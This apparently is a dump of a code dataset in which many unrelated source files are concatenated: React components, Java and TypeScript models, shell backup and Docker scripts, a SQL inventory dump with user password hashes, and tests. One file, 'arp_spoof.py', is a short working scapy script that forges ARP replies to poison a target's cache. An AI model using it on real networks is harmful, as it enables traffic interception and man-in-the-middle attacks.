text stringlengths 1 1.05M |
|---|
import React, { Component } from 'react'
import { connect } from 'react-redux'
import { Switch, Route, withRouter } from 'react-router-dom'
import Navbar from '../../component/navbar/Navbar'
import ExpenseGroupDetailPage from '../expense-group-detail-page/ExpenseGroupDetailPage'
import ExpenseGroupAddPage from '../expense-group-add-page/ExpenseGroupAddPage'
import ExpenseGroupExpenseAddPage from '../expense-group-expense-add-page/ExpenseGroupExpenseAddPage'
import ExpenseGroupMemberAddPage from '../expense-group-member-add-page/ExpenseGroupMemberAddPage'
import ExpenseGroupsPage from '../expense-groups-page/ExpenseGroupsPage'
import { BlockLoading } from 'react-loadingg'
import { loadingSelector } from '../../redux/selectors'
import FeedbackBar from '../feedback-bar/FeedbackBar'
import { clearFeedback } from '../../redux/interactions'
import history from '../../common/history'
import HomePage from '../home-page/HomePage'
class App extends Component {
componentDidMount() {
let {dispatch } = this.props
this.unlisten = history.listen((location) => {
clearFeedback(dispatch);
})
}
componentWillUnmount() {
this.unlisten()
}
render() {
const { loading } = this.props
return (
<div>
<Navbar />
<FeedbackBar />
{loading && <BlockLoading />}
<div className="App">
<Switch>
<Route exact path="/" component={HomePage} />
<Route
exact
path="/expense-groups"
component={ExpenseGroupsPage}
/>
<Route
exact
path="/expense-group/:contractAddress"
component={ExpenseGroupDetailPage}
/>
<Route
exact
path="/expense-groups/add"
component={ExpenseGroupAddPage}
/>
<Route
exact
path="/expense-group/:contractAddress/expenses/add"
component={ExpenseGroupExpenseAddPage}
/>
<Route
exact
path="/expense-group/:contractAddress/members/add"
component={ExpenseGroupMemberAddPage}
/>
</Switch>
</div>
</div>
)
}
}
function mapStateToProps(state) {
return {
loading: loadingSelector(state),
}
}
export default withRouter(connect(mapStateToProps)(App))
|
package com.mc.user.mapper;
import com.baomidou.mybatisplus.extension.plugins.pagination.Page;
import com.mc.common.model.SysUser;
import com.mc.db.mapper.SuperMapper;
import org.apache.ibatis.annotations.Param;
import java.util.List;
import java.util.Map;
/**
* [SysUserMapper 用户表 Mapper 接口]
*
* @author likai
* @version 1.0
* @date 2019/12/11 0011 15:42
* @company Gainet
* @copyright copyright (c) 2019
*/
public interface SysUserMapper extends SuperMapper<SysUser> {
/**
* 分页查询用户列表
* @param page
* @param params
* @return
*/
List<SysUser> findList(Page<SysUser> page, @Param("u") Map<String, Object> params);
}
|
<filename>src/models/Tag.ts
import mongoose from "mongoose";
export type TagModel = mongoose.Document & {
name: string;
};
const tagSchema = new mongoose.Schema({
name: String
});
const Tag = mongoose.model("Tag", tagSchema);
export default Tag;
|
#!/usr/bin/env bash
#
# dowork.sh - Docker WeChat Work for Linux
#
# Author: Huan (李卓桓) <zixia@zixia.net>
# Copyright (c) 2020-now
#
# License: Apache-2.0
# GitHub: https://github.com/huan/docker-wxwork
#
set -eo pipefail
function hello () {
cat <<'EOF'
____ __ __ _
| _ \ __\ \ / /__ _ __| | __
| | | |/ _ \ \ /\ / / _ \| '__| |/ /
| |_| | (_) \ V V / (_) | | | <
|____/ \___/ \_/\_/ \___/|_| |_|\_\
https://github.com/huan/docker-wxwork
+--------------+
/| /|
/ | / |
*--+-----------* |
| | | |
| | 盒装 | |
| | 企业 | |
| +-- 微信 ---+--+
| / | /
|/ |/
*--------------*
DoWork /dɑɑˈwɜːk/ (Docker-wxWork) is:
📦 a Docker image
🤐 for running PC Windows WeChat Work
💻 on your Linux desktop
💖 by one-line of command
EOF
}
function pullUpdate () {
if [ -n "$DOWORK_SKIP_PULL" ]; then
return
fi
echo '🚀 Pulling the latest docker image...'
echo
docker pull zixia/wxwork
echo
echo '🚀 Pulling the latest docker image done.'
}
function main () {
hello
pullUpdate
DEVICE_ARG=()
for DEVICE in /dev/video* /dev/snd; do
DEVICE_ARG+=('--device' "$DEVICE")
done
echo '🚀 Starting DoWork /dɑɑˈwɜːk/ ...'
echo
#
# --privileged: enable sound (/dev/snd/)
# --ipc=host: enable MIT_SHM (XWindows)
#
docker run \
"${DEVICE_ARG[@]}" \
--name DoWork \
--rm \
-i \
\
-v "$HOME/DoWork/WXWork/":'/home/user/WXWork/' \
-v "$HOME/DoWork/Applcation Data":'/home/user/.wine/drive_c/users/user/Application Data/' \
-v /tmp/.X11-unix:/tmp/.X11-unix \
\
-e DISPLAY \
-e DOWORK_DEBUG \
-e DOWORK_DPI \
\
-e XMODIFIERS=@im=fcitx \
-e GTK_IM_MODULE=fcitx \
-e QT_IM_MODULE=fcitx \
-e AUDIO_GID="$(getent group audio | cut -d: -f3)" \
-e VIDEO_GID="$(getent group video | cut -d: -f3)" \
-e GID="$(id -g)" \
-e UID="$(id -u)" \
\
--ipc=host \
--privileged \
\
zixia/wxwork
echo
echo "📦 DoWork Exited with code [$?]"
echo
echo '🐞 Bug Report: https://github.com/huan/docker-wxwork/issues'
echo
}
main
|
# arp_spoof.py
import sys
from scapy.all import ARP, send
def arp_spoof(target_ip, new_ip):
arp = ARP(op=2, pdst=target_ip, psrc=new_ip, hwdst="ff:ff:ff:ff:ff:ff")
send(arp, verbose=0)
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python arp_spoof.py [TARGET IP] [NEW IP]")
sys.exit(1)
target_ip = sys.argv[1]
new_ip = sys.argv[2]
arp_spoof(target_ip, new_ip) |
<filename>src/components/sideMenu/sideMenu.js
const EventHandler = require('../eventHandler/eventHandler');
const MenuList = require('./menuBar/menuList');
const Resizer = require('./resizer');
const Menus = require('./menus');
module.exports = class SideMenu {
constructor() {
this.isOpen = false;
this.currentMenu;
this.MenuList = new MenuList();
this.resizer = new Resizer();
this.Menus = [];
this.EventHandler = new EventHandler();
this.sideMenuComponent = document.getElementById('SideMenu');
this.menuListComponent = document.getElementById('MenuList');
this.menusComponent = document.getElementById('Menus');
this.closedWidth = '3em';
this.openedWidth = '28em';
}
setStyle() {
this.sideMenuComponent.style.width = this.closedWidth;
this.sideMenuComponent.style.height = '100%';
this.menuListComponent.style.width = this.closedWidth;
this.menuListComponent.style.height = '100%';
this.menusComponent.style.width = this.closedWidth;
this.menusComponent.style.height = '100%';
this.menusComponent.style.display = 'none';
}
/**
* Abre ou fecha o menu lateral, dependendo do estádo atual e muda a margem da tela principal
* @param {String}requestedMenu nome do menu que deve ser aberto
*/
changeSideMenu(requestedMenu) {
if (!this.isOpen) {
this.currentMenu = requestedMenu;
this.openSideMenu();
} else if (requestedMenu != this.currentMenu) {
this.currentMenu = requestedMenu;
} else {
this.closeSideMenu();
}
}
openSideMenu() {
this.sideMenuComponent.style.width = this.openedWidth;
this.menusComponent.style.display = 'block';
this.menusComponent.style.width = '25em';
this.isOpen = true;
}
closeSideMenu() {
this.sideMenuComponent.style.width = this.closedWidth;
this.menusComponent.style.display = 'none';
this.isOpen = false;
}
loadMenus() {
Menus.forEach((Menu) => {
const newMenu = new Menu();
newMenu.build();
this.Menus.push(newMenu);
});
}
build() {
this.EventHandler.addEventListener('ChangeSideMenu', (evt) => {
this.changeSideMenu(evt);
});
this.EventHandler.addEventListener('OpenSideMenu', (evt) => {
this.currentMenu = evt.requested;
this.openSideMenu();
});
this.MenuList.build();
this.loadMenus();
this.setStyle();
this.resizer.build();
}
}; |
<gh_stars>1-10
import unittest
from _8a_scraper.users import get_user_info, get_recommended_ascents, get_user_ascents
class TestUsers(unittest.TestCase):
def test_get_user_info(self):
user = '<NAME>'
user_info = get_user_info(user)
self.assertEqual(user_info['location'], 'Brno, Czech Republic')
def test_get_recommended_ascents(self):
user = '<NAME>'
recs = get_recommended_ascents(user)
self.assertGreater(len(recs), 0)
def test_get_user_ascents(self):
user = '<NAME>'
ascents = get_user_ascents(user, 'sportclimbing')
self.assertGreater(len(ascents), 0)
ascents = get_user_ascents(user, 'bouldering')
self.assertGreater(len(ascents), 0)
if __name__ == '__main__':
unittest.main()
|
<reponame>broeker/jumpsuit-build
import React from 'react'
import { Link } from 'gatsby'
import { withStyles } from '@material-ui/core/styles';
import Card from '@material-ui/core/Card';
import CardActionArea from '@material-ui/core/CardActionArea';
import CardContent from '@material-ui/core/CardContent';
import Typography from '@material-ui/core/Typography';
import Img from 'gatsby-image';
import Fade from '@material-ui/core/Fade';
import AuthorDetails from '../AuthorDetails/AuthorDetails'
import { mdiArrowRightBoldCircle} from '@mdi/js'
import Icon from '@mdi/react'
import Grid from '@material-ui/core/Grid';
const styles = {
root: {
color: '#37474F',
height: 'auto',
},
icon: {
vertialAlign: 'bottom',
textAlign: 'right',
},
card: {
height: '100%',
padding: 0,
}
};
class BlogCard extends React.Component {
state = {
checked: false,
};
handleChange = () => {
this.setState(state => ({ checked: !state.checked }));
};
renderElement() {
const { classes } = this.props;
const { checked } = this.state;
if (this.props) {
return (
<>
<CardActionArea
onMouseEnter={this.handleChange}
onMouseLeave={this.handleChange}
style={{ textDecoration: 'none' }}
classes={{
root: classes.root, // class name, e.g. `classes-nesting-root-x`
}}
>
<Link style={{ textDecoration: 'none'}} to={this.props.path}>
<Card className={classes.card}>
{this.props.media &&
<Img fluid={this.props.media} />
}
<CardContent>
<Grid container>
<Grid item sm={6}>
<Typography variant="overline">{this.props.category}</Typography>
</Grid>
<Grid item className={classes.icon} sm={6}>
<Fade in={checked} timeout={ 1500 } >
<Icon className={classes.icon} color="#ff9800" path={mdiArrowRightBoldCircle} size={1.2}/>
</Fade>
</Grid>
</Grid>
<Typography variant="h3" component="h3">{this.props.title}
</Typography>
<Typography variant="subtitle2" dangerouslySetInnerHTML={{ __html: this.props.summary }} />
<AuthorDetails
changed={this.props.changed}
/>
</CardContent>
</Card>
</Link>
</CardActionArea>
</>
);
}
}
render() {
return (
<>
{ this.renderElement() }
</>
)
}
};
export default withStyles(styles)(BlogCard); |
-- phpMyAdmin SQL Dump
-- version 5.1.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Dec 27, 2021 at 02:26 PM
-- Server version: 10.4.22-MariaDB
-- PHP Version: 7.3.33
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `citb2`
--
-- --------------------------------------------------------
--
-- Table structure for table `barang`
--
CREATE TABLE `barang` (
`id_barang` int(11) NOT NULL,
`nama_barang` varchar(255) NOT NULL,
`stok` int(11) NOT NULL,
`cover` varchar(222) NOT NULL,
`kategori_barang_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang`
--
INSERT INTO `barang` (`id_barang`, `nama_barang`, `stok`, `cover`, `kategori_barang_id`) VALUES
(1, 'Mimi White AHA', 23, '80d15aab824b87bbae2a5b7a6cc12f22.jpg', 2),
(2, 'Liptint Implora - Vampire Blood', 155, 'faa67580d27cb37de39f10b3c45b726f.png', 1),
(3, 'Ombre Combo Lipcream Implora 01 + Liptint Implora 01', 45, '366f1b2a5ff0c3671293ecdfb1e7f36c.png', 1),
(4, 'Ombre Combo Hanasui Brown Sugar + Liptint Implora 01', 30, '788212525ff79dc42750211131eb25d4.png', 1),
(5, 'Ombre Combo Hanasui Salted Caramel + Liptint Implora 01', 28, 'ded4feb5df447ebb43840dbd8045775c.png', 1),
(6, 'Ombre Combo Lip Velvet Honest + Liptint Implora 01', 72, 'e067022be6074fc7134bf7ee496b5349.png', 1),
(7, '<NAME>', 177, '4dfbb71e3ac9758aee257a188b35333c.JPG', 3),
(8, '<NAME>', 110, '57ec61112195bedb011acca6d521fa7d.JPG', 3),
(9, 'Serum Implora - Luminous Brightening Serum', 150, '6ae099dc8785bd726836af073c9ca0ea.JPG', 2),
(10, 'Serum Implora - Acne Serum', 70, '00029a4f68768b9c38cbae85e9286f7f.JPG', 2),
(11, 'Serum Implora - Midnight Serum', 80, 'f1e441c50a380eced76fbbab0d42f7dc.JPG', 2),
(12, 'Serum Implora - Peeling Serum', 90, '29b050138b934e7264d1e0b163ead07a.JPG', 2),
(13, 'Pixy - 01. Natural Beige', 120, 'faaec99cfa0778f5a82eed5fb6805fb1.JPG', 6),
(14, 'Pixy - 02. Sand Beige', 130, 'd339c2afc6df73ae379aed66e13a44c5.JPG', 6),
(15, 'Pixy - 03. Cream Beige', 140, 'db2d232daa660e1a00dd50235c628368.JPG', 6);
-- --------------------------------------------------------
--
-- Table structure for table `barang_keluar`
--
CREATE TABLE `barang_keluar` (
`id_barang_keluar` int(11) NOT NULL,
`user_id` int(10) NOT NULL,
`barang_id` int(10) NOT NULL,
`jumlah_keluar` int(10) NOT NULL,
`tanggal_keluar` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang_keluar`
--
INSERT INTO `barang_keluar` (`id_barang_keluar`, `user_id`, `barang_id`, `jumlah_keluar`, `tanggal_keluar`) VALUES
(17, 16, 6, 12, '2021-12-27'),
(18, 16, 1, 17, '2021-12-27'),
(19, 16, 1, 170, '2021-12-28'),
(20, 16, 5, 12, '2021-12-28'),
(21, 16, 7, 23, '2021-12-29');
-- --------------------------------------------------------
--
-- Table structure for table `barang_masuk`
--
CREATE TABLE `barang_masuk` (
`id_barang_masuk` int(11) NOT NULL,
`user_id` int(10) NOT NULL,
`barang_id` int(10) NOT NULL,
`jumlah_masuk` int(10) NOT NULL,
`tanggal_masuk` date NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `barang_masuk`
--
INSERT INTO `barang_masuk` (`id_barang_masuk`, `user_id`, `barang_id`, `jumlah_masuk`, `tanggal_masuk`) VALUES
(19, 16, 2, 10, '2021-12-27'),
(20, 16, 3, 25, '2021-12-27'),
(21, 16, 2, 23, '2021-12-27'),
(22, 16, 6, 34, '2021-12-28'),
(23, 16, 1, 27, '2021-12-16'),
(24, 16, 2, 0, '2021-12-16'),
(25, 16, 2, 112, '2021-12-13'),
(26, 16, 7, 100, '2021-12-01'),
(27, 16, 1, 123, '2021-12-27');
-- --------------------------------------------------------
--
-- Table structure for table `kategori_barang`
--
CREATE TABLE `kategori_barang` (
`id_kategori` int(11) NOT NULL,
`kategori_barang` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `kategori_barang`
--
INSERT INTO `kategori_barang` (`id_kategori`, `kategori_barang`) VALUES
(1, 'Lipstik'),
(2, 'Serum'),
(3, 'Sabun'),
(6, 'Concealer');
-- --------------------------------------------------------
--
-- Table structure for table `user`
--
CREATE TABLE `user` (
`id` int(11) NOT NULL,
`username` varchar(50) NOT NULL,
`password` varchar(255) NOT NULL,
`nama` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `user`
--
INSERT INTO `user` (`id`, `username`, `password`, `nama`) VALUES
(16, 'admin', '<PASSWORD>', '<PASSWORD>'),
(17, 'agus', '<PASSWORD>', '<NAME>'),
(18, 'dioo', '<PASSWORD>588f1cc932815', 'Agung Dio Asbhi'),
(19, 'tari', 'f024197cc16a7c1eda2e4c677616051d', 'Lestari Kurnia Ningsih');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `barang`
--
ALTER TABLE `barang`
ADD PRIMARY KEY (`id_barang`),
ADD KEY `kategori_barang_id` (`kategori_barang_id`);
--
-- Indexes for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
ADD PRIMARY KEY (`id_barang_keluar`),
ADD KEY `barang_id` (`barang_id`),
ADD KEY `user_id` (`user_id`);
--
-- Indexes for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
ADD PRIMARY KEY (`id_barang_masuk`),
ADD KEY `barang_id` (`barang_id`),
ADD KEY `user_id` (`user_id`);
--
-- Indexes for table `kategori_barang`
--
ALTER TABLE `kategori_barang`
ADD PRIMARY KEY (`id_kategori`);
--
-- Indexes for table `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `barang`
--
ALTER TABLE `barang`
MODIFY `id_barang` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;
--
-- AUTO_INCREMENT for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
MODIFY `id_barang_keluar` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=22;
--
-- AUTO_INCREMENT for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
MODIFY `id_barang_masuk` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;
--
-- AUTO_INCREMENT for table `kategori_barang`
--
ALTER TABLE `kategori_barang`
MODIFY `id_kategori` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
--
-- AUTO_INCREMENT for table `user`
--
ALTER TABLE `user`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `barang`
--
ALTER TABLE `barang`
ADD CONSTRAINT `barang_ibfk_1` FOREIGN KEY (`kategori_barang_id`) REFERENCES `kategori_barang` (`id_kategori`);
--
-- Constraints for table `barang_keluar`
--
ALTER TABLE `barang_keluar`
ADD CONSTRAINT `barang_keluar_ibfk_1` FOREIGN KEY (`barang_id`) REFERENCES `barang` (`id_barang`),
ADD CONSTRAINT `barang_keluar_ibfk_2` FOREIGN KEY (`user_id`) REFERENCES `user` (`id`);
--
-- Constraints for table `barang_masuk`
--
ALTER TABLE `barang_masuk`
ADD CONSTRAINT `barang_masuk_ibfk_1` FOREIGN KEY (`barang_id`) REFERENCES `barang` (`id_barang`),
ADD CONSTRAINT `barang_masuk_ibfk_2` FOREIGN KEY (`user_id`) REFERENCES `user` (`id`);
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
|
<gh_stars>0
export default interface ICreateGameDTO {
name: string;
description: string;
image: File | string;
}
|
(defn avg
"calculate the average of a list"
[list]
(/
(reduce + 0 list)
(count list))) |
#!/bin/bash
#===============================================================================
#
# FILE: Backup-Home.sh
#
# USAGE: ./Backup-Home.sh
#
# DESCRIPTION: Backups home directory to Backups.
#
# OPTIONS: None
# REQUIREMENTS: None
# BUGS: None
# NOTES:
# AUTHOR: Brett Salemink (BS), brett.salemink@gmail.com
# COMPANY: Rogue Designs
# VERSION: 1.0
# CREATED: 12/04/2017 04:02:50 PM CST
# REVISION:
#===============================================================================`
SRCDIR="/"
DESTDIR="/mnt/FreeAgent/Backups/Stretch/"
EXCLUDEFILENAME="/home/brettsalemink/.excludefile"
FILENAME=Stretch-Backup-$(date +%Y%m%d%T).tgz
FILEDATE=$(date +%Y%m%d%T)
PACKAGENAME="-package-selection"
PACKAGEFILENAME=$FILEDATE$PACKAGENAME
function create_package_list ()
{
dpkg --get-selections > $DESTDIR$PACKAGEFILENAME
} # -------- end of function create_package_list -----------
function backup_home ()
{
echo $FILENAME
tar --create -X $EXCLUDEFILENAME --exclude-backups --exclude-vcs-ignores --verbose --gzip --file=$DESTDIR$FILENAME $SRCDIR
} # ---------- end of function backup_home ----------
function sync_antergos()
{
rsync -rvz --progress --ignore-existing /mnt/FreeAgent/Backups/Stretch/ brettsalemink@antergos.roguedesigns.us:/mnt/Data/Backups/Stretch/
}
function sync_mega()
{
mega-sync /mnt/FreeAgent/Backups/Stretch/ /Backups/Stretch/
}
function remove_local_backups ()
{
#echo "Not Removing Old Backups"
# sudo rm -r /mnt/FreeAgent/Backups/Stretch
# sudo mkdir /mnt/FreeAgent/Backups/Stretch
# sudo chown -R nfsusernobody:nfsgroupnone /mnt/FreeAgent/Backups/
# sudo chmod -R 774 /mnt/FreeAgent/Backups/
} # -------- end function remove_local_backups -------
create_package_list
backup_home
sync_antergos
#sync_mega
#remove_local_backups
exit
|
#!/bin/bash
[[ -z "$1" ]] && echo "Usage: $0 http://fqdn.tld/uri/to/test/with/get" && exit 1
curl=`type curl | awk '{print $3}'`
[[ ! -x $curl ]] && echo "Curl could not be found; aborting." && exit 1
$curl -L -o /dev/null -v -s -H 'Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no' $1
|
#!/bin/sh
cat << EOF > /app/backend/appdata/default.json
{
"YoutubeDLMaterial": {
"Host": {
"url": "http://example.com",
"port": ${PORT}
},
"Downloader": {
"path-audio": "audio/",
"path-video": "video/",
"default_file_output": "",
"use_youtubedl_archive": false,
"custom_args": "",
"safe_download_override": false,
"include_thumbnail": true,
"include_metadata": true,
"download_rate_limit": ""
},
"Extra": {
"title_top": "YoutubeDL-Material",
"file_manager_enabled": true,
"allow_quality_select": true,
"download_only_mode": false,
"allow_multi_download_mode": true,
"enable_downloads_manager": true,
"allow_playlist_categorization": true
},
"API": {
"use_API_key": false,
"API_key": "",
"use_youtube_API": false,
"youtube_API_key": "",
"use_twitch_API": false,
"twitch_API_key": "",
"twitch_auto_download_chat": false,
"use_sponsorblock_API": false
},
"Themes": {
"default_theme": "default",
"allow_theme_change": true
},
"Subscriptions": {
"allow_subscriptions": true,
"subscriptions_base_path": "subscriptions/",
"subscriptions_check_interval": "300",
"redownload_fresh_uploads": false,
"download_delay": ""
},
"Users": {
"base_path": "users/",
"allow_registration": true,
"auth_method": "internal",
"ldap_config": {
"url": "ldap://localhost:389",
"bindDN": "cn=root",
"bindCredentials": "secret",
"searchBase": "ou=passport-ldapauth",
"searchFilter": "(uid={{username}})"
}
},
"Database": {
"use_local_db": true,
"mongodb_connection_string": "mongodb://127.0.0.1:27017/?compressors=zlib"
},
"Advanced": {
"default_downloader": "youtube-dl",
"use_default_downloading_agent": true,
"custom_downloading_agent": "",
"multi_user_mode": false,
"allow_advanced_download": false,
"use_cookies": false,
"jwt_expiration": 86400,
"logger_level": "info"
}
}
}
EOF
set -eu
CMD="forever app.js"
# if the first arg starts with "-" pass it to program
if [ "${1#-}" != "$1" ]; then
set -- "$CMD" "$@"
fi
# chown current working directory to current user
if [ "$*" = "$CMD" ] && [ "$(id -u)" = "0" ]; then
find . \! -user "$UID" -exec chown "$UID:$GID" -R '{}' + || echo "WARNING! Could not change directory ownership. If you manage permissions externally this is fine, otherwise you may experience issues when downloading or deleting videos."
exec su-exec "$UID:$GID" "$0" "$@"
fi
exec "$@"
|
/*
* Revolut for Business OpenAPI
* No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
*
* The version of the OpenAPI document: 1.0.0
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
package biz.turnonline.ecosystem.revolut.business.draft.model;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonPropertyOrder;
import io.swagger.annotations.ApiModelProperty;
import java.time.LocalDate;
import java.util.Objects;
import java.util.UUID;
/**
* PaymentOrderInfo
*/
@JsonPropertyOrder( {
PaymentOrderInfo.JSON_PROPERTY_ID,
PaymentOrderInfo.JSON_PROPERTY_SCHEDULED_FOR,
PaymentOrderInfo.JSON_PROPERTY_TITLE,
PaymentOrderInfo.JSON_PROPERTY_PAYMENTS_COUNT
} )
public class PaymentOrderInfo
{
public static final String JSON_PROPERTY_ID = "id";
public static final String JSON_PROPERTY_SCHEDULED_FOR = "scheduled_for";
public static final String JSON_PROPERTY_TITLE = "title";
public static final String JSON_PROPERTY_PAYMENTS_COUNT = "payments_count";
private UUID id;
private LocalDate scheduledFor;
private String title;
private Integer paymentsCount;
public PaymentOrderInfo id( UUID id )
{
this.id = id;
return this;
}
/**
* Get id
*
* @return id
**/
@ApiModelProperty( required = true, value = "" )
@JsonProperty( JSON_PROPERTY_ID )
@JsonInclude( value = JsonInclude.Include.ALWAYS )
public UUID getId()
{
return id;
}
public void setId( UUID id )
{
this.id = id;
}
public PaymentOrderInfo scheduledFor( LocalDate scheduledFor )
{
this.scheduledFor = scheduledFor;
return this;
}
/**
* Get scheduledFor
*
* @return scheduledFor
**/
@javax.annotation.Nullable
@ApiModelProperty( value = "" )
@JsonProperty( JSON_PROPERTY_SCHEDULED_FOR )
@JsonInclude( value = JsonInclude.Include.USE_DEFAULTS )
public LocalDate getScheduledFor()
{
return scheduledFor;
}
public void setScheduledFor( LocalDate scheduledFor )
{
this.scheduledFor = scheduledFor;
}
public PaymentOrderInfo title( String title )
{
this.title = title;
return this;
}
/**
* Get title
*
* @return title
**/
@javax.annotation.Nullable
@ApiModelProperty( value = "" )
@JsonProperty( JSON_PROPERTY_TITLE )
@JsonInclude( value = JsonInclude.Include.USE_DEFAULTS )
public String getTitle()
{
return title;
}
public void setTitle( String title )
{
this.title = title;
}
public PaymentOrderInfo paymentsCount( Integer paymentsCount )
{
this.paymentsCount = paymentsCount;
return this;
}
/**
* Get paymentsCount
*
* @return paymentsCount
**/
@ApiModelProperty( required = true, value = "" )
@JsonProperty( JSON_PROPERTY_PAYMENTS_COUNT )
@JsonInclude( value = JsonInclude.Include.ALWAYS )
public Integer getPaymentsCount()
{
return paymentsCount;
}
public void setPaymentsCount( Integer paymentsCount )
{
this.paymentsCount = paymentsCount;
}
@Override
public boolean equals( java.lang.Object o )
{
if ( this == o )
{
return true;
}
if ( o == null || getClass() != o.getClass() )
{
return false;
}
PaymentOrderInfo paymentOrderInfo = ( PaymentOrderInfo ) o;
return Objects.equals( this.id, paymentOrderInfo.id ) &&
Objects.equals( this.scheduledFor, paymentOrderInfo.scheduledFor ) &&
Objects.equals( this.title, paymentOrderInfo.title ) &&
Objects.equals( this.paymentsCount, paymentOrderInfo.paymentsCount );
}
@Override
public int hashCode()
{
return Objects.hash( id, scheduledFor, title, paymentsCount );
}
@Override
public String toString()
{
StringBuilder sb = new StringBuilder();
sb.append( "class PaymentOrderInfo {\n" );
sb.append( " id: " ).append( toIndentedString( id ) ).append( "\n" );
sb.append( " scheduledFor: " ).append( toIndentedString( scheduledFor ) ).append( "\n" );
sb.append( " title: " ).append( toIndentedString( title ) ).append( "\n" );
sb.append( " paymentsCount: " ).append( toIndentedString( paymentsCount ) ).append( "\n" );
sb.append( "}" );
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString( java.lang.Object o )
{
if ( o == null )
{
return "null";
}
return o.toString().replace( "\n", "\n " );
}
}
|
SELECT *
FROM employees
WHERE name LIKE 'J%' and salary > 25000; |
<gh_stars>1-10
package grpcgraphql.animal;
import io.grpc.stub.StreamObserver;
import org.lognet.springboot.grpc.GRpcService;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.List;
@GRpcService
public class AnimalService extends AnimalServiceGrpc.AnimalServiceImplBase {
private static final Logger LOG = LoggerFactory.getLogger(AnimalService.class);
private static final List<AnimalOuterClass.Animal> ALL_ANIMALS = List.of(
AnimalOuterClass.Animal.newBuilder()
.setName("Pulpo")
.setColor("pink")
.addAllCountry(List.of("A", "F"))
.build(),
AnimalOuterClass.Animal.newBuilder()
.setName("Croco")
.setColor("green")
.addAllCountry(List.of("A", "B", "F"))
.build(),
AnimalOuterClass.Animal.newBuilder()
.setName("Gato")
.setColor("black")
.addCountry("E")
.build(),
AnimalOuterClass.Animal.newBuilder()
.setName("Chicko")
.setColor("yellow")
.addAllCountry(List.of("A", "B", "C", "D"))
.build()
);
@Override
public void getAnimals(AnimalOuterClass.AnimalRequest request, StreamObserver<AnimalOuterClass.AnimalsReply> responseObserver) {
final AnimalOuterClass.AnimalsReply.Builder replyBuilder =
AnimalOuterClass.AnimalsReply.newBuilder();
String animalId = request.getId();
if (animalId == null || "".equals(animalId)) {
replyBuilder.addAllAnimal(ALL_ANIMALS);
} else {
replyBuilder.addAnimal(ALL_ANIMALS.get(Integer.parseInt(animalId)));
}
responseObserver.onNext(replyBuilder.build());
responseObserver.onCompleted();
LOG.info("================> getAnimals done for id: {}", animalId);
}
}
|
import tensorflow as tf
def modify_tensor(x: tf.Tensor, stride: int, si: int) -> tf.Tensor:
# Adjust negative starting index within stride
if si < 0:
si = x.shape[-1] + si
# Reshape the input tensor based on stride and starting index
reshaped_tensor = tf.reshape(x, (-1, stride, x.shape[-1] // stride))
# Apply a specific operation to the reshaped tensor
modified_tensor = tf.reduce_sum(reshaped_tensor, axis=1)
return modified_tensor |
import re
import collections
def words(text):
return re.findall('[a-z]+', text.lower())
def train(features):
model = collections.defaultdict(lambda: 1)
for f in features:
model[f] += 1
return model
NWORDS = train(words(open('big.txt').read()))
def edits1(word):
s = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [a + b[1:] for a, b in s if b]
transposes = [a + b[1] + b[0] + b[2:] for a, b in s if len(b)>1]
replaces = [a + c + b[1:] for a, b in s for c in alphabet if b]
inserts = [a + c + b for a, b in s for c in alphabet]
return set(deletes + transposes + replaces + inserts)
def known_edits2(word):
return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)
def known(words):
return set(w for w in words if w in NWORDS)
def correct(word):
candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
return max(candidates, key=NWORDS.get) |
<gh_stars>10-100
# -*- coding: utf-8 -*-
import unittest.mock as mock
import testutils.cases as cases
import app.authentication.emails as emails
